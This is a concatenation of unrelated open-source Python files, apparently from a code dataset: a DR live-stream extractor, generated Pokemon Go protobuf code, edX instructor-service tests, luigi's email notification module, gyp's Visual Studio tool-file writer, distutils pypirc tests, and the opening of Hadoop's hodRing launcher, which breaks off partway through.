'ext': 'mp4',
'title': 're:^DR1 [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$',
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
channel_id = self._match_id(url)
channel_data = self._download_json(
'https://www.dr.dk/mu-online/api/1.0/channel/' + channel_id,
channel_id)
title = self._live_title(channel_data['Title'])
formats = []
for streaming_server in channel_data.get('StreamingServers', []):
server = streaming_server.get('Server')
if not server:
continue
link_type = streaming_server.get('LinkType')
for quality in streaming_server.get('Qualities', []):
for stream in quality.get('Streams', []):
stream_path = stream.get('Stream')
if not stream_path:
continue
stream_url = update_url_query(
'%s/%s' % (server, stream_path), {'b': ''})
if link_type == 'HLS':
formats.extend(self._extract_m3u8_formats(
stream_url, channel_id, 'mp4',
m3u8_id=link_type, fatal=False, live=True))
elif link_type == 'HDS':
formats.extend(self._extract_f4m_formats(update_url_query(
'%s/%s' % (server, stream_path), {'hdcore': '3.7.0'}),
channel_id, f4m_id=link_type, fatal=False))
self._sort_formats(formats)
return {
'id': channel_id,
'title': title,
'thumbnail': channel_data.get('PrimaryImageUri'),
'formats': formats,
'is_live': True,
}
|
obiben/pokemongo-api | refs/heads/master | pogo/POGOProtos/Data/Battle/BattleAction_pb2.py | 4 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Data/Battle/BattleAction.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Data.Battle import BattleResults_pb2 as POGOProtos_dot_Data_dot_Battle_dot_BattleResults__pb2
from POGOProtos.Data.Battle import BattleActionType_pb2 as POGOProtos_dot_Data_dot_Battle_dot_BattleActionType__pb2
from POGOProtos.Data.Battle import BattleParticipant_pb2 as POGOProtos_dot_Data_dot_Battle_dot_BattleParticipant__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Data/Battle/BattleAction.proto',
package='POGOProtos.Data.Battle',
syntax='proto3',
serialized_pb=_b('\n)POGOProtos/Data/Battle/BattleAction.proto\x12\x16POGOProtos.Data.Battle\x1a*POGOProtos/Data/Battle/BattleResults.proto\x1a-POGOProtos/Data/Battle/BattleActionType.proto\x1a.POGOProtos/Data/Battle/BattleParticipant.proto\"\x85\x04\n\x0c\x42\x61ttleAction\x12\x36\n\x04Type\x18\x01 \x01(\x0e\x32(.POGOProtos.Data.Battle.BattleActionType\x12\x17\n\x0f\x61\x63tion_start_ms\x18\x02 \x01(\x03\x12\x13\n\x0b\x64uration_ms\x18\x03 \x01(\x05\x12\x14\n\x0c\x65nergy_delta\x18\x05 \x01(\x05\x12\x16\n\x0e\x61ttacker_index\x18\x06 \x01(\x05\x12\x14\n\x0ctarget_index\x18\x07 \x01(\x05\x12\x19\n\x11\x61\x63tive_pokemon_id\x18\x08 \x01(\x04\x12@\n\rplayer_joined\x18\t \x01(\x0b\x32).POGOProtos.Data.Battle.BattleParticipant\x12=\n\x0e\x62\x61ttle_results\x18\n \x01(\x0b\x32%.POGOProtos.Data.Battle.BattleResults\x12*\n\"damage_windows_start_timestamp_mss\x18\x0b \x01(\x03\x12(\n damage_windows_end_timestamp_mss\x18\x0c \x01(\x03\x12>\n\x0bplayer_left\x18\r \x01(\x0b\x32).POGOProtos.Data.Battle.BattleParticipant\x12\x19\n\x11target_pokemon_id\x18\x0e \x01(\x04\x62\x06proto3')
,
dependencies=[POGOProtos_dot_Data_dot_Battle_dot_BattleResults__pb2.DESCRIPTOR,POGOProtos_dot_Data_dot_Battle_dot_BattleActionType__pb2.DESCRIPTOR,POGOProtos_dot_Data_dot_Battle_dot_BattleParticipant__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_BATTLEACTION = _descriptor.Descriptor(
name='BattleAction',
full_name='POGOProtos.Data.Battle.BattleAction',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Type', full_name='POGOProtos.Data.Battle.BattleAction.Type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='action_start_ms', full_name='POGOProtos.Data.Battle.BattleAction.action_start_ms', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='duration_ms', full_name='POGOProtos.Data.Battle.BattleAction.duration_ms', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='energy_delta', full_name='POGOProtos.Data.Battle.BattleAction.energy_delta', index=3,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attacker_index', full_name='POGOProtos.Data.Battle.BattleAction.attacker_index', index=4,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='target_index', full_name='POGOProtos.Data.Battle.BattleAction.target_index', index=5,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='active_pokemon_id', full_name='POGOProtos.Data.Battle.BattleAction.active_pokemon_id', index=6,
number=8, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_joined', full_name='POGOProtos.Data.Battle.BattleAction.player_joined', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='battle_results', full_name='POGOProtos.Data.Battle.BattleAction.battle_results', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='damage_windows_start_timestamp_mss', full_name='POGOProtos.Data.Battle.BattleAction.damage_windows_start_timestamp_mss', index=9,
number=11, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='damage_windows_end_timestamp_mss', full_name='POGOProtos.Data.Battle.BattleAction.damage_windows_end_timestamp_mss', index=10,
number=12, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_left', full_name='POGOProtos.Data.Battle.BattleAction.player_left', index=11,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='target_pokemon_id', full_name='POGOProtos.Data.Battle.BattleAction.target_pokemon_id', index=12,
number=14, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=209,
serialized_end=726,
)
_BATTLEACTION.fields_by_name['Type'].enum_type = POGOProtos_dot_Data_dot_Battle_dot_BattleActionType__pb2._BATTLEACTIONTYPE
_BATTLEACTION.fields_by_name['player_joined'].message_type = POGOProtos_dot_Data_dot_Battle_dot_BattleParticipant__pb2._BATTLEPARTICIPANT
_BATTLEACTION.fields_by_name['battle_results'].message_type = POGOProtos_dot_Data_dot_Battle_dot_BattleResults__pb2._BATTLERESULTS
_BATTLEACTION.fields_by_name['player_left'].message_type = POGOProtos_dot_Data_dot_Battle_dot_BattleParticipant__pb2._BATTLEPARTICIPANT
DESCRIPTOR.message_types_by_name['BattleAction'] = _BATTLEACTION
BattleAction = _reflection.GeneratedProtocolMessageType('BattleAction', (_message.Message,), dict(
DESCRIPTOR = _BATTLEACTION,
__module__ = 'POGOProtos.Data.Battle.BattleAction_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Data.Battle.BattleAction)
))
_sym_db.RegisterMessage(BattleAction)
# @@protoc_insertion_point(module_scope)
|
cpollard1001/FreeCAD_sf_master | refs/heads/master | src/Mod/Material/Init.py | 29 | #***************************************************************************
#* *
#* Copyright (c) 2013 - Juergen Riegel <[email protected]> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
# import for the FreeCAD Material card
FreeCAD.addImportType("FreeCAD Material Card (*.FCMat)","importFCMat")
|
pixelgremlins/ztruck | refs/heads/master | dj/lib/python2.7/fnmatch.py | 4 | /usr/lib/python2.7/fnmatch.py |
fintech-circle/edx-platform | refs/heads/master | lms/djangoapps/instructor/tests/test_services.py | 10 | """
Tests for the InstructorService
"""
import json
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from courseware.models import StudentModule
from lms.djangoapps.instructor.access import allow_access
from lms.djangoapps.instructor.services import InstructorService
from lms.djangoapps.instructor.tests.test_tools import msk_from_problem_urlname
from nose.plugins.attrib import attr
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
import mock
@attr(shard=1)
class InstructorServiceTests(SharedModuleStoreTestCase):
"""
Tests for the InstructorService
"""
@classmethod
def setUpClass(cls):
super(InstructorServiceTests, cls).setUpClass()
cls.course = CourseFactory.create()
cls.problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-problem-urlname'
)
cls.other_problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-other_problem-urlname'
)
cls.problem_urlname = unicode(cls.problem_location)
cls.other_problem_urlname = unicode(cls.other_problem_location)
def setUp(self):
super(InstructorServiceTests, self).setUp()
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.service = InstructorService()
self.module_to_reset = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.problem_location,
state=json.dumps({'attempts': 2}),
)
@mock.patch('lms.djangoapps.grades.signals.handlers.PROBLEM_WEIGHTED_SCORE_CHANGED.send')
def test_reset_student_attempts_delete(self, _mock_signal):
"""
Test delete student state.
"""
# make sure the attempt is there
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.course.id,
module_state_key=self.module_to_reset.module_state_key,
).count(),
1
)
self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
self.problem_urlname,
requesting_user=self.student,
)
# make sure the module has been deleted
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.course.id,
module_state_key=self.module_to_reset.module_state_key,
).count(),
0
)
def test_reset_bad_content_id(self):
"""
Negative test of trying to reset attempts with bad content_id
"""
result = self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
'foo/bar/baz',
requesting_user=self.student,
)
self.assertIsNone(result)
def test_reset_bad_user(self):
"""
Negative test of trying to reset attempts with bad user identifier
"""
result = self.service.delete_student_attempt(
'bad_student',
unicode(self.course.id),
'foo/bar/baz',
requesting_user=self.student,
)
self.assertIsNone(result)
def test_reset_non_existing_attempt(self):
"""
Negative test of trying to reset attempts with bad user identifier
"""
result = self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
self.other_problem_urlname,
requesting_user=self.student,
)
self.assertIsNone(result)
def test_is_user_staff(self):
"""
Test to assert that the user is staff or not
"""
result = self.service.is_course_staff(
self.student,
unicode(self.course.id)
)
self.assertFalse(result)
# allow staff access to the student
allow_access(self.course, self.student, 'staff')
result = self.service.is_course_staff(
self.student,
unicode(self.course.id)
)
self.assertTrue(result)
def test_report_suspicious_attempt(self):
"""
Test to verify that the create_zendesk_ticket() is called
"""
requester_name = "edx-proctoring"
email = "[email protected]"
subject = "Proctored Exam Review: {review_status}".format(review_status="Suspicious")
body = "A proctored exam attempt for {exam_name} in {course_name} by username: {student_username} was " \
"reviewed as {review_status} by the proctored exam review provider."
body = body.format(
exam_name="test_exam", course_name=self.course.display_name, student_username="test_student",
review_status="Suspicious"
)
tags = ["proctoring"]
with mock.patch("lms.djangoapps.instructor.services.create_zendesk_ticket") as mock_create_zendesk_ticket:
self.service.send_support_notification(
course_id=unicode(self.course.id),
exam_name="test_exam",
student_username="test_student",
review_status="Suspicious"
)
mock_create_zendesk_ticket.assert_called_with(requester_name, email, subject, body, tags)
|
vektorlab/multivac | refs/heads/master | multivac/util.py | 2 | from datetime import datetime
def unix_time(dt):
epoch = datetime.utcfromtimestamp(0)
delta = dt - epoch
return int(round(delta.total_seconds()))
def format_time(unix_time):
if isinstance(unix_time, str):
unix_time = int(unix_time)
return datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d %H:%M:%S')
|
linsomniac/luigi | refs/heads/master | luigi/notifications.py | 3 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
''' Supports sending emails when tasks fail.
This needs some more documentation.
See :doc:`/configuration` for configuration options.
In particular using the config `error-email` should set up Luigi so that it will send emails when tasks fail.
.. code-block:: ini
[core]
[email protected]
TODO: Eventually, all email configuration should move into the [email] section.
'''
import logging
import socket
import sys
import textwrap
from luigi import configuration
import luigi.task
import luigi.parameter
logger = logging.getLogger("luigi-interface")
DEFAULT_CLIENT_EMAIL = 'luigi-client@%s' % socket.gethostname()
DEBUG = False
class TestNotificationsTask(luigi.task.Task):
"""
You may invoke this task to quickly check if you correctly have setup your
notifications Configuration. You can run:
.. code-block:: console
$ luigi TestNotifications --local-scheduler
And then check your email inbox to see if you got an error email or any
other kind of notifications that you expected.
"""
raise_in_complete = luigi.parameter.BoolParameter(description='If true, fail in complete() instead of run()')
def run(self):
raise ValueError('Testing notifications triggering')
def complete(self):
if self.raise_in_complete:
raise ValueError('Testing notifications triggering')
return False
def email_type():
return configuration.get_config().get('core', 'email-type', 'plain')
def generate_email(sender, subject, message, recipients, image_png):
import email
import email.mime
import email.mime.multipart
import email.mime.text
import email.mime.image
msg_root = email.mime.multipart.MIMEMultipart('related')
msg_text = email.mime.text.MIMEText(message, email_type())
msg_text.set_charset('utf-8')
msg_root.attach(msg_text)
if image_png:
with open(image_png, 'rb') as fp:
msg_image = email.mime.image.MIMEImage(fp.read(), 'png')
msg_root.attach(msg_image)
msg_root['Subject'] = subject
msg_root['From'] = sender
msg_root['To'] = ','.join(recipients)
return msg_root
def wrap_traceback(traceback):
"""
For internal use only (until further notice)
"""
if email_type() == 'html':
try:
from pygments import highlight
from pygments.lexers import PythonTracebackLexer
from pygments.formatters import HtmlFormatter
with_pygments = True
except ImportError:
with_pygments = False
if with_pygments:
formatter = HtmlFormatter(noclasses=True)
wrapped = highlight(traceback, PythonTracebackLexer(), formatter)
else:
wrapped = '<pre>%s</pre>' % traceback
else:
wrapped = traceback
return wrapped
def send_email_smtp(config, sender, subject, message, recipients, image_png):
import smtplib
smtp_ssl = config.getboolean('core', 'smtp_ssl', False)
smtp_without_tls = config.getboolean('core', 'smtp_without_tls', False)
smtp_host = config.get('core', 'smtp_host', 'localhost')
smtp_port = config.getint('core', 'smtp_port', 0)
smtp_local_hostname = config.get('core', 'smtp_local_hostname', None)
smtp_timeout = config.getfloat('core', 'smtp_timeout', None)
kwargs = dict(host=smtp_host, port=smtp_port, local_hostname=smtp_local_hostname)
if smtp_timeout:
kwargs['timeout'] = smtp_timeout
smtp_login = config.get('core', 'smtp_login', None)
smtp_password = config.get('core', 'smtp_password', None)
smtp = smtplib.SMTP(**kwargs) if not smtp_ssl else smtplib.SMTP_SSL(**kwargs)
smtp.ehlo_or_helo_if_needed()
if smtp.has_extn('starttls') and not smtp_without_tls:
smtp.starttls()
if smtp_login and smtp_password:
smtp.login(smtp_login, smtp_password)
msg_root = generate_email(sender, subject, message, recipients, image_png)
smtp.sendmail(sender, recipients, msg_root.as_string())
def send_email_ses(config, sender, subject, message, recipients, image_png):
"""
Sends notification through AWS SES.
Does not handle access keys. Use either
1/ configuration file
2/ EC2 instance profile
See also https://boto3.readthedocs.io/en/latest/guide/configuration.html.
"""
from boto3 import client as boto3_client
client = boto3_client('ses')
msg_root = generate_email(sender, subject, message, recipients, image_png)
response = client.send_raw_email(Source=sender,
Destinations=recipients,
RawMessage={'Data': msg_root.as_string()})
logger.debug(("Message sent to SES.\nMessageId: {},\nRequestId: {},\n"
"HTTPSStatusCode: {}").format(response['MessageId'],
response['ResponseMetadata']['RequestId'],
response['ResponseMetadata']['HTTPStatusCode']))
def send_email_sendgrid(config, sender, subject, message, recipients, image_png):
import sendgrid
client = sendgrid.SendGridClient(config.get('email', 'SENDGRID_USERNAME', None),
config.get('email', 'SENDGRID_PASSWORD', None),
raise_errors=True)
to_send = sendgrid.Mail()
to_send.add_to(recipients)
to_send.set_from(sender)
to_send.set_subject(subject)
if email_type() == 'html':
to_send.set_html(message)
else:
to_send.set_text(message)
if image_png:
to_send.add_attachment(image_png)
client.send(to_send)
def _email_disabled():
if email_type() == 'none':
logger.info("Not sending email when email-type is none")
return True
elif configuration.get_config().getboolean('email', 'force-send', False):
return False
elif sys.stdout.isatty():
logger.info("Not sending email when running from a tty")
return True
elif DEBUG:
logger.info("Not sending email when running in debug mode")
else:
return False
def send_email_sns(config, sender, subject, message, topic_ARN, image_png):
"""
Sends notification through AWS SNS. Takes Topic ARN from recipients.
Does not handle access keys. Use either
1/ configuration file
2/ EC2 instance profile
See also https://boto3.readthedocs.io/en/latest/guide/configuration.html.
"""
from boto3 import resource as boto3_resource
sns = boto3_resource('sns')
topic = sns.Topic(topic_ARN[0])
# Subject is max 100 chars
if len(subject) > 100:
subject = subject[0:48] + '...' + subject[-49:]
response = topic.publish(Subject=subject, Message=message)
logger.debug(("Message sent to SNS.\nMessageId: {},\nRequestId: {},\n"
"HTTPSStatusCode: {}").format(response['MessageId'],
response['ResponseMetadata']['RequestId'],
response['ResponseMetadata']['HTTPStatusCode']))
def send_email(subject, message, sender, recipients, image_png=None):
"""
Decides whether to send notification. Notification is cancelled if there are
no recipients or if stdout is onto tty or if in debug mode.
Dispatches on config value email.type. Default is 'smtp'.
"""
config = configuration.get_config()
notifiers = {'ses': send_email_ses,
'sendgrid': send_email_sendgrid,
'smtp': send_email_smtp,
'sns': send_email_sns}
subject = _prefix(subject)
if not recipients or recipients == (None,):
return
if _email_disabled():
return
# Clean the recipients lists to allow multiple error-email addresses, comma
# separated in luigi.cfg
recipients_tmp = []
for r in recipients:
recipients_tmp.extend([a.strip() for a in r.split(',') if a.strip()])
# Replace original recipients with the clean list
recipients = recipients_tmp
# Get appropriate sender and call it to send the notification
email_sender_type = config.get('email', 'type', None)
email_sender = notifiers.get(email_sender_type, send_email_smtp)
email_sender(config, sender, subject, message, recipients, image_png)
def _email_recipients(additional_recipients=None):
config = configuration.get_config()
receiver = config.get('core', 'error-email', None)
recipients = [receiver] if receiver else []
if additional_recipients:
if isinstance(additional_recipients, str):
recipients.append(additional_recipients)
else:
recipients.extend(additional_recipients)
return recipients
def send_error_email(subject, message, additional_recipients=None):
"""
Sends an email to the configured error-email.
If no error-email is configured, then a message is logged.
"""
config = configuration.get_config()
recipients = _email_recipients(additional_recipients)
if recipients:
sender = config.get('core', 'email-sender', DEFAULT_CLIENT_EMAIL)
logger.info("Sending warning email to %r", recipients)
send_email(
subject=subject,
message=message,
sender=sender,
recipients=recipients
)
else:
logger.info("Skipping error email. Set `error-email` in the `core` "
"section of the luigi config file or override `owner_email`"
"in the task to receive error emails.")
def _prefix(subject):
"""
If the config has a special prefix for emails then this function adds
this prefix.
"""
config = configuration.get_config()
email_prefix = config.get('core', 'email-prefix', None)
if email_prefix is not None:
subject = "%s %s" % (email_prefix, subject)
return subject
def format_task_error(headline, task, command, formatted_exception=None):
"""
Format a message body for an error email related to a luigi.task.Task
:param headline: Summary line for the message
:param task: `luigi.task.Task` instance where this error occurred
:param formatted_exception: optional string showing traceback
:return: message body
"""
typ = email_type()
if formatted_exception:
formatted_exception = wrap_traceback(formatted_exception)
else:
formatted_exception = ""
if typ == 'html':
msg_template = textwrap.dedent('''
<html>
<body>
<h2>{headline}</h2>
<table style="border-top: 1px solid black; border-bottom: 1px solid black">
<thead>
<tr><th>name</th><td>{name}</td></tr>
</thead>
<tbody>
{param_rows}
</tbody>
</table>
</pre>
<h2>Command line</h2>
<pre>
{command}
</pre>
<h2>Traceback</h2>
{traceback}
</body>
</html>
''')
str_params = task.to_str_params()
params = '\n'.join('<tr><th>{}</th><td>{}</td></tr>'.format(*items) for items in str_params.items())
body = msg_template.format(headline=headline, name=task.task_family, param_rows=params,
command=command, traceback=formatted_exception)
else:
msg_template = textwrap.dedent('''\
{headline}
Name: {name}
Parameters:
{params}
Command line:
{command}
{traceback}
''')
str_params = task.to_str_params()
max_width = max([0] + [len(x) for x in str_params.keys()])
params = '\n'.join(' {:{width}}: {}'.format(*items, width=max_width) for items in str_params.items())
body = msg_template.format(headline=headline, name=task.task_family, params=params,
command=command, traceback=formatted_exception)
return body
|
itomg/node-gyp | refs/heads/master | gyp/pylib/gyp/MSVSToolFile.py | 2736 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio project reader/writer."""
import gyp.common
import gyp.easy_xml as easy_xml
class Writer(object):
"""Visual Studio XML tool file writer."""
def __init__(self, tool_file_path, name):
"""Initializes the tool file.
Args:
tool_file_path: Path to the tool file.
name: Name of the tool file.
"""
self.tool_file_path = tool_file_path
self.name = name
self.rules_section = ['Rules']
def AddCustomBuildRule(self, name, cmd, description,
additional_dependencies,
outputs, extensions):
"""Adds a rule to the tool file.
Args:
name: Name of the rule.
description: Description of the rule.
cmd: Command line of the rule.
additional_dependencies: other files which may trigger the rule.
outputs: outputs of the rule.
extensions: extensions handled by the rule.
"""
rule = ['CustomBuildRule',
{'Name': name,
'ExecutionDescription': description,
'CommandLine': cmd,
'Outputs': ';'.join(outputs),
'FileExtensions': ';'.join(extensions),
'AdditionalDependencies':
';'.join(additional_dependencies)
}]
self.rules_section.append(rule)
def WriteIfChanged(self):
"""Writes the tool file."""
content = ['VisualStudioToolFile',
{'Version': '8.00',
'Name': self.name
},
self.rules_section
]
easy_xml.WriteXmlIfChanged(content, self.tool_file_path,
encoding="Windows-1252")
|
LaoZhongGu/kbengine | refs/heads/master | kbe/res/scripts/common/Lib/distutils/tests/test_config.py | 53 | """Tests for distutils.pypirc.pypirc."""
import sys
import os
import unittest
import tempfile
from distutils.core import PyPIRCCommand
from distutils.core import Distribution
from distutils.log import set_threshold
from distutils.log import WARN
from distutils.tests import support
from test.support import run_unittest
PYPIRC = """\
[distutils]
index-servers =
server1
server2
[server1]
username:me
password:secret
[server2]
username:meagain
password: secret
realm:acme
repository:http://another.pypi/
"""
PYPIRC_OLD = """\
[server-login]
username:tarek
password:secret
"""
WANTED = """\
[distutils]
index-servers =
pypi
[pypi]
username:tarek
password:xxx
"""
class PyPIRCCommandTestCase(support.TempdirManager,
support.LoggingSilencer,
support.EnvironGuard,
unittest.TestCase):
def setUp(self):
"""Patches the environment."""
super(PyPIRCCommandTestCase, self).setUp()
self.tmp_dir = self.mkdtemp()
os.environ['HOME'] = self.tmp_dir
self.rc = os.path.join(self.tmp_dir, '.pypirc')
self.dist = Distribution()
class command(PyPIRCCommand):
def __init__(self, dist):
PyPIRCCommand.__init__(self, dist)
def initialize_options(self):
pass
finalize_options = initialize_options
self._cmd = command
self.old_threshold = set_threshold(WARN)
def tearDown(self):
"""Removes the patch."""
set_threshold(self.old_threshold)
super(PyPIRCCommandTestCase, self).tearDown()
def test_server_registration(self):
# This test makes sure PyPIRCCommand knows how to:
# 1. handle several sections in .pypirc
# 2. handle the old format
# new format
self.write_file(self.rc, PYPIRC)
cmd = self._cmd(self.dist)
config = cmd._read_pypirc()
config = list(sorted(config.items()))
waited = [('password', 'secret'), ('realm', 'pypi'),
('repository', 'http://pypi.python.org/pypi'),
('server', 'server1'), ('username', 'me')]
self.assertEqual(config, waited)
# old format
self.write_file(self.rc, PYPIRC_OLD)
config = cmd._read_pypirc()
config = list(sorted(config.items()))
waited = [('password', 'secret'), ('realm', 'pypi'),
('repository', 'http://pypi.python.org/pypi'),
('server', 'server-login'), ('username', 'tarek')]
self.assertEqual(config, waited)
def test_server_empty_registration(self):
cmd = self._cmd(self.dist)
rc = cmd._get_rc_file()
self.assertTrue(not os.path.exists(rc))
cmd._store_pypirc('tarek', 'xxx')
self.assertTrue(os.path.exists(rc))
f = open(rc)
try:
content = f.read()
self.assertEqual(content, WANTED)
finally:
f.close()
def test_suite():
return unittest.makeSuite(PyPIRCCommandTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
|
zincumyx/Mammoth | refs/heads/master | mammoth-src/src/contrib/hod/hodlib/HodRing/hodRing.py | 118 | #Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#!/usr/bin/env python
"""hodring launches hadoop commands on work node and
cleans up all the work dirs afterward
"""
# -*- python -*-
import os, sys, time, shutil, getpass, xml.dom.minidom, xml.dom.pulldom
import socket, sets, urllib, csv, signal, pprint, random, re, httplib
from xml.dom import getDOMImplementation
from pprint import pformat
from optparse import OptionParser
from urlparse import urlparse
from hodlib.Common.util import local_fqdn, parseEquals, getMapredSystemDirectory, isProcessRunning
from hodlib.Common.tcp import tcpSocket, tcpError
binfile = sys.path[0]
libdir = os.path.dirname(binfile)
sys.path.append(libdir)
import hodlib.Common.logger
from hodlib.GridServices.service import *
from hodlib.Common.util import *
from hodlib.Common.socketServers import threadedHTTPServer
from hodlib.Common.hodsvc import hodBaseService
from hodlib.Common.threads import simpleCommand
from hodlib.Common.xmlrpc import hodXRClient
mswindows = (sys.platform == "win32")
originalcwd = os.getcwd()
reHdfsURI = re.compile("hdfs://(.*?:\d+)(.*)")
class CommandDesc:
"""A class that represents the commands that
are run by hodring"""
def __init__(self, dict, log):
self.log = log
self.log.debug("In command desc")
self.log.debug("Done in command desc")
dict.setdefault('argv', [])
dict.setdefault('version', None)
dict.setdefault('envs', {})
dict.setdefault('workdirs', [])
dict.setdefault('attrs', {})
dict.setdefault('final-attrs', {})
dict.setdefault('fg', False)
dict.setdefault('ignorefailures', False)
dict.setdefault('stdin', None)
self.log.debug("Printing dict")
self._checkRequired(dict)
self.dict = dict
def _checkRequired(self, dict):
if 'name' not in dict:
raise ValueError, "Command description lacks 'name'"
if 'program' not in dict:
raise ValueError, "Command description lacks 'program'"
if 'pkgdirs' not in dict:
raise ValueError, "Command description lacks 'pkgdirs'"
def getName(self):
return self.dict['name']
def getProgram(self):
return self.dict['program']
def getArgv(self):
return self.dict['argv']
def getVersion(self):
return self.dict['version']
def getEnvs(self):
return self.dict['envs']
def getPkgDirs(self):
return self.dict['pkgdirs']
def getWorkDirs(self):
return self.dict['workdirs']
def getAttrs(self):
return self.dict['attrs']
def getfinalAttrs(self):
return self.dict['final-attrs']
def isForeground(self):
return self.dict['fg']
def isIgnoreFailures(self):
return self.dict['ignorefailures']
def getStdin(self):
return self.dict['stdin']
def parseDesc(str):
dict = CommandDesc._parseMap(str)
dict['argv'] = CommandDesc._parseList(dict['argv'])
dict['envs'] = CommandDesc._parseMap(dict['envs'])
dict['pkgdirs'] = CommandDesc._parseList(dict['pkgdirs'], ':')
dict['workdirs'] = CommandDesc._parseList(dict['workdirs'], ':')
dict['attrs'] = CommandDesc._parseMap(dict['attrs'])
dict['final-attrs'] = CommandDesc._parseMap(dict['final-attrs'])
return CommandDesc(dict)
parseDesc = staticmethod(parseDesc)
def _parseList(str, delim = ','):
list = []
for row in csv.reader([str], delimiter=delim, escapechar='\\',
